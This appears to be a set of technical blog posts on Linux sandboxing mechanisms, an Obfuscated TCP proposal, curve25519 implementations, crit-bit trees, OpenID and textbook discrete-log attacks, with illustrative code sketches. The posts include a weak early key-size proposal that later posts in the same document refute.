People have been using chroot jails for many years. A chroot call changes the root of the filesystem for the current process. Once that has happened the process cannot interact with any of the filesystem outside the jail. As long as the process cannot gain root access, it's a good security measure.

Resource limits prevent denial of service attacks by, say, trying to use up all the memory on the system. See the getrlimit manpage for details.
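As a minimal sketch of applying such a limit before running untrusted code, the helper below (cap_resource is my own name for it) lowers both the soft and hard limit for a resource, so that the process cannot raise it again without privileges:

```c
#include <assert.h>
#include <sys/resource.h>

/* Lowers the soft and hard limits for `resource` to `limit`. The request
 * is clamped to the existing hard limit, since an unprivileged process may
 * only lower it. Returns 0 on success, -1 on error. */
static int cap_resource(int resource, rlim_t limit) {
  struct rlimit rl;
  if (getrlimit(resource, &rl) != 0) return -1;

  if (rl.rlim_max != RLIM_INFINITY && limit > rl.rlim_max)
    limit = rl.rlim_max;

  rl.rlim_cur = limit;
  rl.rlim_max = limit;
  return setrlimit(resource, &rl);
}
```

For example, cap_resource(RLIMIT_AS, 256u << 20) would restrict the address space to 256MB, and cap_resource(RLIMIT_CORE, 0) disables core dumps.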

These two mechanisms are supported by most UNIX like systems. However, there are some limitations:

Network access, for one, is not mediated by the filesystem on these platforms, so a compromised process could spew spam or launch attacks on an internal network. Also, the chroot call requires root access. Traditionally this has been done with a small SUID helper binary, but then root access is needed to install etc.

ptrace jails

The ptrace call is used by the strace utility which shows a trace of all the system calls that a child makes. It can also be used to mediate those system calls.

It works like this: the untrusted child is traced by a trusted parent and the kernel arranges that all system calls that the child makes cause a SIGTRAP, stopping the child. The parent can then read the registers and memory of the child and decide if the system call is allowed, permitting it or simulating an error if not.

The first issue is that some system calls take pointers to userspace memory which needs to be validated. Take open, which passes a pointer to the filename to be opened. If the parent wishes to validate the filename it has to read the child's memory and check that it's within limits. That's perfectly doable with ptrace.

The issue comes when there are multiple threads in the untrusted address space. In between the parent validating the filename and the kernel reading it, another thread can change its contents. In the case of open that means that the validator in the parent sees one (safe) filename but the kernel actually acts on another. Because of this, either multithreaded children need to be prohibited, or the validator must forbid all system calls which take a pointer to a buffer which needs to be validated.

When calls like open have been prohibited, there's another trick which can be used to securely replace it:

UNIX domain sockets are able to transmit file descriptors between processes. Not just the integer value, but a reference to the actual descriptor (which will almost certainly have a different integer value in the other process). For details see the unix and cmsg manpages.

With this ability an untrusted child can securely open a file by making a request, over a UNIX domain socket to a trusted broker. The broker can validate the filename requested in safety: because it's in another address space the filename is safe between validation and use by the kernel. The broker can then return the file descriptor over the socket to the untrusted child.
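The broker pattern can be sketched in a few lines with Python's socket.send_fds and socket.recv_fds (Python 3.9+), which wrap the SCM_RIGHTS mechanism described in the manpages. The function names, the one-byte "Y"/"N" reply and the single allowed directory are all assumptions made for this sketch, not anything from Chromium.

```python
import os
import socket


def sandboxed_request(sock, path):
    """Untrusted side: ask the broker to open `path` on our behalf."""
    sock.sendall(path.encode())


def broker_handle_one(sock, allowed_dir):
    """Trusted side: validate one request and reply with a descriptor."""
    # The filename is now a copy in the broker's own memory, so the
    # requester cannot change it between the check and the open() below.
    requested = sock.recv(4096).decode()
    real = os.path.realpath(requested)
    allowed = os.path.realpath(allowed_dir)
    if os.path.commonpath([real, allowed]) != allowed:
        sock.sendall(b"N")                    # refused: outside the jail
        return False
    fd = os.open(real, os.O_RDONLY)
    try:
        socket.send_fds(sock, [b"Y"], [fd])   # passes a reference, not an int
    finally:
        os.close(fd)                          # the receiver has its own copy
    return True


def sandboxed_receive(sock):
    """Untrusted side: collect the reply. Returns an fd, or None if refused."""
    data, fds, _flags, _addr = socket.recv_fds(sock, 1, 1)
    return fds[0] if data == b"Y" and fds else None
```

A real broker would also have to worry about symlinks changing on disk between the realpath check and the open; this sketch only shows that the filename itself is out of the untrusted process's reach.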

The major problem with ptrace jails is that they have a high cost at every system call. On my 2.33GHz Core2 a simple getpid call takes 128ns. When a process is ptraced, that rises to 13,800ns (a factor of 100x slower). Additionally, Chromium on Linux is a 32-bit process because of our JIT, so getting the current time is a system call too.

Seccomp

Seccomp has a rather messy past (see the linked Wikipedia page for details). It's a Linux specific mode which a process can request whereby only read, write, exit and sigreturn system calls are allowed. Making any system call not on the permitted list results in immediate termination of the process.

This is a very tight jail, designed for pure computation and is perfect for that. It's enabled by default in kernel builds (although some distributions disable it I believe). It used to be enabled via a file in /proc but, in order to save space, it's now a prctl.

The issue is that the jail is too tight. It's great that read and write calls are enabled without overhead because that's much of what one of our rendering processes will use, but many other system calls would be nice (brk and mmap for memory allocation, gettimeofday etc). We would have to use the broker model for all of them.

For some calls the broker model has to be updated. Allocating memory to an address space isn't something which can be performed outside that address space so, in this case, the broker for these calls has to be in the same address space. This means that there's an untrusted thread running under seccomp and a trusted thread, not running seccomped, in the same process. The untrusted thread can request more memory by making a request over a pipe to the trusted thread. The trusted thread can then perform the allocation in the same address space.

This presents some issues when writing the trusted code. Because untrusted code has access to the memory the only thing the trusted thread can trust are its registers. That means no stack nor heap usage. Basically the trusted code has to be written in assembly and has to be pretty simple. That's not a huge problem for us however.

But we will be making lots of these other system calls, not just the memory allocation ones, but time calls, poll etc. All have to use a broker model.

To recap, a basic system call (getpid) on my 2.33GHz Core2 takes about 128ns. Performing the same operation over a pipe to another thread takes 7,775ns and to another process takes 8,423ns, roughly a factor of 60x slower.

Again, this is a very painful slowdown given the volume of such calls that we expect to make.

SELinux

Fedora, rightfully, makes a lot of noise about the fact that they have SELinux. It's a huge beast and Fedora's work has mostly been a process of taming the complexity and dealing with the fact that very little is written with SELinux in mind.

I don't have Fedora installed anywhere, but this may be a very nice solution to our issues. However, I suspect that root access will be required, again, to configure it. I speak mostly from a position of ignorance here, however. I should install Fedora at some point and have a play.

The Other Man's Grass

Recent releases of OSX have a system call actually called sandbox_init. It's a little half-baked at the moment, but shows great promise.

It's a feature from TrustedBSD and, in the limit, allows for a Scheme like language to give a detailed specification of the shape of the sandbox which is compiled to bytecode and loaded into the kernel. You can see some examples of the profile language in the slides for this USENIX talk. But, for the moment, I believe that just a few preset profiles are provided (see the manpage).

Rolling one's own

SELinux is implemented atop LSM, which is a general framework for hooking security decisions in the Linux kernel. It's conceivable that one could write a sandboxing module using these hooks.

It would require root access to install, but then so do many of the other solutions. It would probably play badly with other LSM users too, but Fedora is the only major distribution to be using them as far as I know. However, it would also be a large distraction.

Summary of data
Platform  Simple system call  ... via a broker thread  ... via a broker process  ... when ptraced
32-bit    136.9ns             8161.4ns                 8327.3ns                  14087.0ns
64-bit    128.7ns             7775.0ns                 8423.3ns                  13779.9ns

Obfuscated TCP

Now in its 3rd iteration, Obfuscated TCP has an updated site, mostly working code etc. I need people to go to the site, look at the docs, watch the video, build the code, try stuff out etc. Tell me what works and what doesn't. Email address is at the top of the page. Thanks to all who do, and remember that you don't only have to email if you have problems; positive reports are good too!

Google datacenters

There are different levels of secrets at Google. Almost everything unreleased is “confidential” - which means that we don't talk about it to the outside world. Then there is the “top secret” stuff - stuff that you don't even talk about to other Googlers.

Now, top secret stuff is rare because it's a little poisonous. An environment where lots of things are secret between coworkers isn't a pleasant one. How we cool our data centers was one of those items and I was sworn to secrecy when I was lucky enough to be given a guided tour of our Oregon operations.

But, for whatever reasons, this information is now public! Seriously, this is some of the coolest (no pun intended) stuff that Google does: go read about evaporative cooling.

A Rabin-Williams signature scheme: rwb0fuz1024

I wrote a Rabin-Williams signature scheme [source]:

  • Verification speeds 4x RSA (on a Core2 2.33GHz, at least)
  • Signatures are half the size of RSA for the same security
  • A hash-generic attack is provably as hard as factoring

Crit-bit trees

I wrote up djb's implementation of crit-bit trees for strings here [pdf]. Crit-bit trees have several nice properties:

  • Fast: only a single string compare per lookup.
  • For finite sets (like 32-bit ints) the depth of the tree is bounded by the length of the longest element.
  • Simple code - no complex balancing operations
  • Supports the usual tree operations: successor, minimum, prefix set etc.
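To make those properties a little more concrete, here's a small sketch of a crit-bit tree over byte strings. It is not djb's code: the class and method names are invented for this example, it keeps the critical bit as a plain single-bit mask, and it assumes keys contain no zero bytes (as with C strings), since a shorter key is treated as if padded with zeros.

```python
class _Node:
    """Internal node: the critical bit is `mask` within byte index `byte`."""
    __slots__ = ("byte", "mask", "child")

    def __init__(self, byte, mask, left, right):
        self.byte, self.mask, self.child = byte, mask, [left, right]


def _byte_at(key, i):
    return key[i] if i < len(key) else 0


class CritBitTree:
    def __init__(self):
        self.root = None                    # None, a bytes leaf, or a _Node

    def _walk(self, key):
        """Follow key's bits down to a leaf without comparing any strings."""
        node = self.root
        while isinstance(node, _Node):
            node = node.child[1 if _byte_at(key, node.byte) & node.mask else 0]
        return node

    def __contains__(self, key):
        # The single string compare per lookup happens here.
        return self.root is not None and self._walk(key) == key

    def insert(self, key):
        if self.root is None:
            self.root = key
            return True
        best = self._walk(key)
        for i in range(max(len(key), len(best))):
            diff = _byte_at(key, i) ^ _byte_at(best, i)
            if diff:
                break
        else:
            return False                    # already present
        mask = 1 << (diff.bit_length() - 1)  # most significant differing bit
        side = 1 if _byte_at(key, i) & mask else 0
        # Descend again, stopping at the first node whose critical bit comes
        # after the new one; the new node is spliced in above it.
        parent, node = None, self.root
        while isinstance(node, _Node) and (node.byte, -node.mask) < (i, -mask):
            parent = node
            slot = 1 if _byte_at(key, node.byte) & node.mask else 0
            node = node.child[slot]
        pair = [node, node]
        pair[side] = key
        new = _Node(i, mask, pair[0], pair[1])
        if parent is None:
            self.root = new
        else:
            parent.child[slot] = new
        return True

    def __iter__(self):
        """Yield the keys in sorted order (left subtree first)."""
        stack = [self.root] if self.root is not None else []
        while stack:
            node = stack.pop()
            if isinstance(node, _Node):
                stack.extend((node.child[1], node.child[0]))
            else:
                yield node
```

Note that insertion never rebalances anything: the shape of the tree is fully determined by the set of keys, whatever order they arrive in.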

Several groups of Linux k...

Several groups of Linux kernel papers have been published recently. Here's my pick of them:

First we have the Proceedings of the 2008 Linux Symposium (these are in some sort of order, favourite first):

Next there's the ACM SIGOPS Operating Systems Review. These papers are about much more experimental developments in the kernel and are thus more fun, even if they are less likely to see the light of day:

I've just released two new...

I've just released two new curve25519 implementations: one in C and one in x86-64 assembly. The latter is 10% faster than djb's implementation.

curve25519 is an elliptic curve, developed by Dan Bernstein, for fast Diffie-Hellman key agreement. DJB's original implementation was written in a language of his own devising called qhasm. The original qhasm source isn't available, only the x86 32-bit assembly output.

Since many x86 systems are now 64-bit, and portability is important, this project provides alternative implementations for other platforms.

Implementation           Platform    Author  32-bit speed  64-bit speed
curve25519               x86 32-bit  djb     265µs         N/A
curve25519-donna-x86-64  x86 64-bit  agl     N/A           240µs
curve25519-donna         Portable C  agl     2179µs        628µs

(All tests run on a 2.33GHz Intel Core2)
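For anyone wondering what these implementations actually compute, here's a slow but short sketch of the curve25519 function in Python, following the Montgomery ladder as laid out in RFC 7748. It is emphatically not the donna code: it uses Python's big integers, branches on secret bits (so it isn't constant time) and is only meant to show the shape of the key agreement.

```python
P = 2**255 - 19          # the field prime that gives the curve its name
A24 = 121665             # (486662 - 2) / 4, from the curve equation


def _clamp(k):
    """Turn 32 secret bytes into a scalar, as curve25519 specifies."""
    b = bytearray(k)
    b[0] &= 248
    b[31] &= 127
    b[31] |= 64
    return int.from_bytes(b, "little")


def x25519(k, u):
    """Multiply the point with x-coordinate `u` by scalar `k` (both 32 bytes)."""
    scalar = _clamp(k)
    x1 = int.from_bytes(u, "little") & ((1 << 255) - 1)
    x2, z2, x3, z3 = 1, 0, x1, 1
    swap = 0
    for t in reversed(range(255)):
        bit = (scalar >> t) & 1
        swap ^= bit
        if swap:                      # NOT constant time: sketch only
            x2, x3 = x3, x2
            z2, z3 = z3, z2
        swap = bit
        a = (x2 + z2) % P
        aa = a * a % P
        b = (x2 - z2) % P
        bb = b * b % P
        e = (aa - bb) % P
        c = (x3 + z3) % P
        d = (x3 - z3) % P
        da = d * a % P
        cb = c * b % P
        x3 = (da + cb) ** 2 % P
        z3 = x1 * (da - cb) ** 2 % P
        x2 = aa * bb % P
        z2 = e * (aa + A24 * e) % P
    if swap:
        x2, x3 = x3, x2
        z2, z3 = z3, z2
    return (x2 * pow(z2, P - 2, P) % P).to_bytes(32, "little")


BASE_POINT = (9).to_bytes(32, "little")
```

Each side picks 32 random bytes as its private key, publishes x25519(private, BASE_POINT), and then calls x25519(private, peer_public) to arrive at the same 32-byte shared secret.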

Google has, at last, open...

Google has, at last, open sourced Protocol buffers. My very minor contribution to this is that I wrote the basis for the encoding documentation.

Protocol buffers pretty much hit the sweet spot of complexity and capability. (See XML and ASN.1 for examples of attempts which missed.) I have the beginnings of a protocol buffer compiler for Haskell that I wrote for internal apps. Now that the C/Java/Python versions are out, I should probably clean that up and put it on Hackage. But every coder should consider protocol buffers for their serialisation needs from now on.

The Black Swan

Firstly, if you're wondering what happened to all the ObsTCP stuff, it didn't disappear, it just moved to a different blog. Things are still moving as fast as I can push them.

(ISBN: 1400063515)

This book has some good, if unoriginal, points about the stupidity of much of the modeling done in today's world, esp the world of finance. Sadly, these are hidden in many pages of self-centered rambling and discourse on adventitious topics. If you're thinking of buying this book, get The (Mis)behaviour of Markets by Mandelbrot instead; you'll thank me.

I've added a bunch of Obs...

I've added a bunch of Obfuscated TCP stuff to the obstcp project page on code.google.com, including kernel patches, userland tools, specs and friendly introductions.

Also, I posted it to Reddit. If it doesn't get downvoted into /dev/null in 60 seconds, the comments will probably end up there.

OpenID - not actually spawn of Satan

A blog post aggregating complaints about OpenID has been popping up in different places this morning. If you've read it, you might want a little perspective. I'm not going to deal with each point in turn because there are so many, mostly repeating each other.

Phishing

At login time, the site that you're logging into can end up redirecting you to your OpenID provider. Your provider then tells you to go to their site and enter your login information, then click a button to try again. They don't provide a "link" to their site and they don't ask for your password.

Some early providers might not have followed these basic steps, but all the reasonable ones do.

Yes, it's still possible for users to be confused but, by habit, they'll be used to doing the right thing.

XSS and CSRF

XSS problems on the provider's site are a big deal. This criticism is reasonable.

CSRF may be a bigger deal because you are more likely to be 'logged in' to the target. However, most users already keep persistent cookies to save logging into these sites. The additional attack surface here is dubious; CSRF issues are a problem with or without OpenID.

DNS poisoning

If your OpenID starts with https://, you should be protected from DNS poisoning attacks and the like by the usual TLS PKI. This isn't perfect, but it's pretty good.

However, the OpenID spec says that plain domain names are normalised by prepending http://. This is a technical problem with the spec and should be fixed. Until then, this is a reasonable criticism but not a fundamental issue.

Privacy

The OpenID provider has a lot of information about your activities. This is little different than, say, your email account and many people are happy with Gmail. Likewise, password recovery on most of the sites which could use OpenID is based on email access, so most people already have a single password that suffices for entry to many sites.

If you don't like the idea of Gmail you can run your own email server. Likewise, you can run your own OpenID provider.

Using the same OpenID on many sites does allow them to link your activities. So does giving these sites your email address for password recovery. So does using the same IP (although to a lesser extent).

Some providers will let you have many OpenIDs linked to the same account for this reason. Joe user probably won't use that feature and probably gives the same email address to all those sites already and so loses nothing.

Trust problems

OpenID is not a trust system. Trust systems may be built on top of identity systems. Likewise, apples are not oranges and complaints about their lack of tanginess are moot.

Usability / Adoption

Somewhat valid points here. It's a big job to get widespread adoption and, at the moment, it's a pretty small crowd that uses OpenID. However, OpenID doesn't need a flag day; it can have incremental deployment.

Availability

Valid points. If your provider goes down you're going to have a bad day.

Conclusion

I don't believe that OpenID should be used to login to your bank account. However, for the myriad of sites that I login to (Google Reader, reddit, ...) it would be nice to just be able to type my OpenID in. It's decently suited to that because I'm fed up with all these accounts.

I'm now running a Ubuntu ...

I'm now running an Ubuntu-based laptop with a somewhat functional Obfuscated TCP patch in its kernel. (If you have a Neo-like view of the Internets you'll be able to see it by the funny options in the SYN packets.)

Hopefully soon I'll be able to post a first draft patch for other people to try. In the meantime, I wrote the start of the mounds of documentation I suspect it'll need: a very non-technical introduction.

I've updated the patches ...

I've updated the patches linked to in the last post with today's work. Both sides now end up with the same shared key (and not just because they got the same private key from lack of entropy like before). That took some fun tracking down of bugs.

Also, packets are now HMAC-MD5'ed with the shared key, and invalid packets are dropped. That also took far longer than expected. I ended up using the MD5 implementation from the CIFS filesystem because the kernel's crypto library is just plain terrible. It's also totally undocumented but, from what I can see, you can't look up an algorithm without taking a semaphore, and that requires that you be able to sleep. I almost think I must be missing something because that's dumber than the bastard offspring of Randy Hickey and Jade Goodie.

But there we go. Encryption (with Salsa20) to come next Wednesday.

First Obfuscated TCP patches

After a day of kernel hacking, I have a few patches which, together, make a start towards implementing ObsTCP.

At the moment, it will advertise ObsTCP on all connections and, if you have two kernels which support it, you'll get a shared key setup. At the moment, the private key is generated at boot time and since the host doesn't have any entropy then, it's always the same. So I'll have to do something special there. Also, I've a problem where the ACK with the connecting host's public key can get lost. Since ACKs aren't ACKed, this can be a real pain. I think I need to include it in every transmitted packet until (yet another) option signifies that it's been received.

After the last post expla...

After the last post explained why small curves aren't good enough for Obfuscated TCP, I decided that, since I'm going to have to do some damage to the TCP header to get a bigger public key in there anyway, I might as well go the whole way and use curve25519, by djb. Now, djb has forgotten more about elliptic curves than I'll ever know and I feel much happier using a curve that's been designed by him. As you can probably guess from the name, it's a curve over 2^255-19 - a prime. So the public keys are 32 bytes long.

In order to get that much public key material into a TCP header, here's my proposed hack: Jumbo TCP options.

djb's sample implementation of curve25519 is written in a special assembly language called qhasm. Sadly, it's so alpha that he's not actually released it. So the sample implementation is for ia32 only, uses the floating point registers and has 5100 lines of uncommented assembly. It is, however, freaking quick.

However, since I have kernel-space in mind for this I've written a C implementation. It's about 1/3 the speed (and I've not really tried to optimise it yet), doesn't use any floating point (since kernel-space doesn't have easy access to the fp registers in Linux) and fuzz testing seems to indicate that it's correct. (At least, it's giving the same answers as djb's code.)

Next step: hacking up the kernel. (And I thought the elliptic curve maths was hard enough.)

Elliptic curves don't work either

(For context, see my previous post on OTCP)

In any Diffie-Hellman exchange based on elliptic curves, we have Q=aP where P and Q are points on an elliptic curve. The operation of multiplying a point and a scalar is well defined, but unimportant here. The problem facing the attacker is, given Q and P, find a. If they can do that, we're sunk.

If you could find two different pairs of numbers, (c, d) and (e, f), such that cP + dQ = eP + fQ, then you're done because (c-e)P = (f-d)Q = (f-d)aP, and so a = (c-e)/(f-d) mod n, where n is the order of the point P (the size of the group that it generates).

Finding such a point by picking random examples is never going to work because of the storage requirements. However, if you define a step function which takes a pair (c, d) and produces a new pair (c', d') you have defined a cycle through the search space. (It must be a cycle because the search space is finite. At some point you must hit a previous state and loop forever.) Now you can use Floyd's cycle finding algorithm to find a collision with constant space. This is an √n algorithm for breaking this problem and is well known as Pollard's rho method.
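Here's a toy sketch of that method. To keep it short I've swapped the elliptic curve for a small multiplicative group mod p, so cP + dQ becomes g^c * h^d, but the collision algebra is the same: a = (c-e)/(f-d) mod n. The three-way step function and the tiny parameters used with it are choices made for this example only.

```python
import random


def pollard_rho_dlog(g, h, p, n, rng=random):
    """Find a with g**a == h (mod p), where g has prime order n."""

    def step(x, c, d):
        # A fixed function of x alone, so the walk must eventually cycle.
        # The invariant x == g**c * h**d (mod p) is maintained throughout.
        r = x % 3
        if r == 0:
            return x * x % p, 2 * c % n, 2 * d % n
        if r == 1:
            return x * g % p, (c + 1) % n, d
        return x * h % p, c, (d + 1) % n

    while True:
        c0, d0 = rng.randrange(n), rng.randrange(n)
        start = (pow(g, c0, p) * pow(h, d0, p) % p, c0, d0)
        tortoise = hare = start
        while True:                       # Floyd: constant space
            tortoise = step(*tortoise)
            hare = step(*step(*hare))
            if tortoise[0] == hare[0]:
                break
        (_, c, d), (_, e, f) = tortoise, hare
        if (f - d) % n == 0:
            continue                      # useless collision; new start
        return (c - e) * pow((f - d) % n, -1, n) % n
```

With p = 1019 and g = 4 (which has prime order n = 509), pollard_rho_dlog(4, pow(4, 123, 1019), 1019, 509) recovers the exponent 123. Only the tortoise and hare states are stored, however large the group is.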

Now, if you have many of these problems you get a big speed up by using some storage. Assume that you do the legwork to solve an instance of the problem and that you record some fraction of the points that you evaluated. (How you choose the points isn't important so long as it's a function of the point; say pick all points where the first m bits are zero.)

Now, future attempts to break the problem can collide with one of the previous points. If you find cP + dQ = eP + fR (note that P is a constant of the elliptic curve system) and also that R = bP (because we solved this instance previously) then cP + dQ = cP + adP = (e+fb)P and so ((e+fb) - c) / d = a (and we know all the values on the left-hand side).

Now, 2^112 (14 bytes) is about as big an elliptic curve point as we can fit in a TCP header. The maximum options payload is 40 bytes, of which 20 are already taken up in modern TCP stacks. We need 2 bytes of fluff per option and, unless we want this to be the last TCP header ever, we need to leave at least 4 bytes. That's where the 14 byte limit comes from.

We give the attacker 2^50 bytes of space. I believe that each point will take 3*14 bytes of space for the (c,d,Y) triple, where Y = cP+dQ. Thus they can store 2^44 distinguished points. Thus one in 2^(56-44) = 2^12 points is distinguished. Additionally, generating those 2^44 points isn't that hard, computationally. This suggests that an attacker can find a collision in only 2^12 iterations, or about 2^13 field multiplications.

So, again, a reasonable attacker can break our crypto in real time.

This scheme becomes much harder to sell if we have to do evil things to the TCP header in order to make it work.

If you've been wondering ...

If you've been wondering what I'm up to at work, we now have a public blog for the RechargeIt project.

How sad: from reading the...

How sad: from reading the sleepcat documentation on network partitions, it's clear that BDB uses a broken replication system (i.e. not Paxos). That's a shame because I was hoping to use it.

Yahoo now has OpenID for ...

Yahoo now has OpenID for all its accounts, which is great. Wonderful in fact. OpenID is a good thing for many authentication needs on the Internet and will make the world a better place.

However,...

  • SHA256 isn't supported, only SHA1. It's true that the standard doesn't require it, but this still gets you lots of crapness points.
  • The return_to is filtered. Probably someone here had good intentions, but I can redirect a browser to any URL, so filtering the return_to is pointless and overly restrictive. Specifically, it appears that:
    • You can't have a port number in the host
    • You can't have an IP address for a host
    • You can't have a single element hostname (like localhost)
    • So, more crapness points for Yahoo.

    How good is a 64-bit DH exchange?

    In my last post, I suggested that a register based modexp for 64-bit numbers could run at about 500K ops/sec. Well, I wrote one and got 450K ops/sec on an older Core2. (That's with gcc -O3, but no tuning of the code. Plus, I don't know the standard algorithm for 128-bit modulus using 64-bit operations, so I wrote my own, which is almost certainly suboptimal.) Roughly that's 2^20 ops/s, so a brute force solution of 64-bits would take about 2^42 seconds, which is more than enough for us.

    However, there are much better solutions to the discrete log problem than that. Here I'm only dealing with groups of prime order. There are very good solutions for groups of order 2^n, but DH uses prime order groups only.

    The best information I found on this are a set of slides by djb. However, they are a little sparse (since they are slides after all). Quick summary:

    • Brute force parallelises perfectly. An FPGA chip could do 2^30 modexps per second. An array of really good ones could push that upwards of 2^40 modexps/sec.
    • Breaking n Diffie-Hellmans isn't much harder than breaking one of them when using brute force, since you can look for collisions against all n public keys at once. If you were a sniffer trying to sniff hundreds of connections per second, that's actually a big advantage. That could give an amortised benefit equal to 2^10 or more.
    • You can use "random self reduction" to "split" a problem into many problems, where solving any of them breaks the original problem. Combine this with the previous point and you can speed up the breaking of a single problem.
    • If you figure out the optimal number of subproblems to "split" the original problem into you have the "giant step, baby step" algorithm which takes only about 2√n modexps to break (where n is the size of the group, 2^64 in our case).
    • Now things are getting complex, so I'm just going to include the results: Pollard's rho method lets us break 64-bits in 2^32 modexps.
    • The Pohlig-Hellman method is even better, but you can choose a safe prime as your group order to stop it. (A safe prime, p, is such that (p-1)/2 is also prime.)
    • The "index calculus" method uses lots of precomputation against the group order to find specific solutions in that group very quickly. I must admit that I'm a little shaky on how index calculus works, but I've found one empirical result where a Matlab solution was breaking 64-bit discrete logs in < 1 minute, including the precomputation.
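The giant step, baby step idea from the list above is short enough to sketch. This is a toy version for a group of order n mod a small prime p, with the function name and parameters made up for the example; at 64 bits the table would need about 2^32 entries, which is exactly the storage cost that Pollard's rho avoids.

```python
from math import isqrt


def baby_step_giant_step(g, h, p, n):
    """Return a in [0, n) with g**a == h (mod p), or None if there is none.

    g is assumed to have order n modulo the prime p.
    """
    m = isqrt(n - 1) + 1              # ceil(sqrt(n))
    table = {}
    x = 1
    for j in range(m):                # baby steps: remember g^j -> j
        table.setdefault(x, j)
        x = x * g % p
    factor = pow(g, -m, p)            # g^(-m), needs Python 3.8+
    y = h % p
    for i in range(m):                # giant steps: h * g^(-i*m)
        if y in table:
            return (i * m + table[y]) % n
        y = y * factor % p
    return None
```

That's about √n multiplications to build the table and at most another √n to search it, which is where the 2√n figure comes from.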

    In short, attacks against discrete log in prime order groups are a lot stronger than I suspected. The index calculus method, especially, seems to be a killer against 64-bit DH exchanges providing any sort of security. Since we don't have the time (on the server) or the space (in the TCP options) to include a unique group for each exchange, the precomputation advantage means that it's very possible for a sniffer to be breaking these handshakes in real time.

    Damn.

    So it would appear that we need larger key sizes and, possibly elliptic curve based systems (the EC systems, in general, can't be attacked with index calculus based methods). RFC 2385 suggests that 16 bytes in a TCP header is about as much as we would want to add (they are talking about SYN packets, which we don't need to put public values in, but the absolute max is 36 bytes.), which gives us 128-bit public values. Looks like I need to read up on EC systems.

    OTCP - Obfuscated TCP

    Like open SMTP relays, TCP was developed in a kinder, gentler time. With Comcast forging RST packets to disrupt connections and UK ISPs looking to trawl the clickstreams of a nation and sell them (not to mention AT&T copying their backbone to the NSA) it's time that TCP got a little more paranoid.

    The 'correct' solutions are something along the lines of IPSec, but there's no reason to suspect that anyone is going to start using that in droves any time soon. Application level crypto (TLS, SSH etc) is the correct solution for protecting the contents of packets (which would stop the clickstream harvesting style of attacks), but cannot protect the TCP layer (and HTTPS is still not the default for websites).

    An opportunistic obfuscation layer, on by default, would start to address this. By making it transparent to use, it stands a chance of getting some small fraction of traffic to use it. If it were included in Linux distribution kernels we might hope to see it in the wild after a year or so. In certain sectors (BitTorrent users and trackers) we might see it much sooner.

    Our attacker has a couple of weaknesses:

    • Their sniffers are in parallel with their backbone for good reason: if the sniffers fail or cannot keep up with the traffic it's not a big deal. This means that they are limited to observing and injecting traffic. Moving inline (to alter traffic) would be very expensive.
    • Legally, altering traffic seems to be much more sensitive than filtering it. Much of Comcast's statements about their RST injection have been stressing that it's limiting, not forging nor intercepting (however technically false that might be).

    With that in mind I'm going to suggest the following:

    SYN packets from OTCP hosts include an empty TCP option advertising their support. OTCP servers, upon seeing the offer in the SYN packet, generate a random 64-bit number (n), less than a globally known prime (p), and return 2^n mod p in another TCP option in the SYN,ACK. The client performs its end of the DH handshake and includes its own public value in a third option in the next packet to the server.
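The arithmetic of that exchange is tiny, so here's a sketch of it. The prime is an assumption: the proposal only says "a globally known prime", and I've used 2^64 - 59, the largest prime below 2^64, purely as a stand-in. The function names are made up too, and none of the TCP option plumbing is shown.

```python
import secrets

P = 2**64 - 59      # assumed stand-in for the globally known 64-bit prime
G = 2               # the base from the text: public values are 2^n mod p


def make_keypair():
    """Pick a random private exponent and compute the public value."""
    private = secrets.randbelow(P - 2) + 1      # in [1, P-2]
    return private, pow(G, private, P)


def shared_key(private, peer_public):
    """Both ends compute the same 64-bit value from the other's public one."""
    return pow(peer_public, private, P).to_bytes(8, "big")
```

The server would call make_keypair() on seeing the offer and send its public value in the SYN,ACK; the client does the same in its next packet, and both then call shared_key() with what they received.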

    The two hosts now have a shared key which they can use to MAC and encrypt each packet in the subsequent connection (the MAC will be carried in a TCP option). The MAC function includes the TCP header and payload, except the source and destination port numbers. The encryption only covers the TCP payload, not the IP nor TCP headers.
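As a sketch of what "MAC everything except the ports" might look like, here's a version over a fixed 20-byte TCP header with no options. Several things here are assumptions for illustration: HMAC-SHA256 stands in for whatever fast hash is finally chosen, the checksum field is zeroed as well (a box that rewrites ports has to recompute it, and the proposal doesn't say how it is treated), and the function names are invented.

```python
import hashlib
import hmac
import struct

# src port, dst port, seq, ack, data offset, flags, window, checksum, urgent
TCP_HEADER = struct.Struct("!HHIIBBHHH")


def packet_mac(key, header, payload):
    """MAC the header and payload with the port numbers masked out."""
    fields = list(TCP_HEADER.unpack(header))
    fields[0] = fields[1] = 0     # source and destination ports: not covered
    fields[7] = 0                 # checksum: assumption, see above
    masked = TCP_HEADER.pack(*fields)
    return hmac.new(key, masked + payload, hashlib.sha256).digest()


def verify_packet(key, header, payload, tag):
    """Return True if the tag matches; invalid packets would be dropped."""
    return hmac.compare_digest(packet_mac(key, header, payload), tag)
```

Since the ports never enter the MAC, a packet whose source port has been rewritten in transit still verifies, while a changed sequence number or payload does not.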

    The hash function and cipher need to be very fast and just strong enough; the key is only 64-bits. MD4 for the hash function and AES128 for the cipher, say. (benchmarks for different functions from the Crypto++ library). I suspect that the cipher needs to be a block cipher because packets get retransmitted and reordered. A block cipher in CTR mode based on the sequence number seems to be the best way to deal with this.

    A getsockopt interface would allow userland to find out if a given connection is OTCP, and to get the shared key.

    Q: Can't this be broken by man-in-the-middle attacks?

    Yes. However, note that this would require interception of traffic which is much more costly than sniffers in parallel and legally more troublesome for the attacker. Additionally, userland crypto protocols could be extended to include the shared secret in their certified handshakes, thus giving them MITM-proof security which includes the TCP layer.

    Q: Isn't the key size very small?

    Yes. However, even if the key could be brute forced in 10 seconds; that's still far too much work for a device which is monitoring hundreds or thousands of connections per second.

    Q: Doesn't this break NATs?

    NATs rewrite the IP addresses and port numbers in the packets, which we don't include in our MAC protection, so everything should work. If the NAT happens to rebuild the whole packet, the OTCP offer in the SYN packet will be removed. In this case we lose OTCP but, most importantly, we don't break any users.

    NATs which monitor the application level and try to rewrite IP addresses in there will be broken by this. However, the number of protocols which do this is small and clients may be configured by default not to offer OTCP when the destination port number matches one of these protocols (IRC and FTP spring to mind). This is a hack, but the downside to users of OTCP must be as small as possible.

    Q: So can't I break this by filtering the offer from the SYN packet?

    Yes. Application level protocols could be extended to sense this downgrade attack and stop working, but mostly see the points above: it's much more expensive to do this since it needs to be done in the router and it's legally more troublesome for the attacker.

    Q: Won't this take too much time?

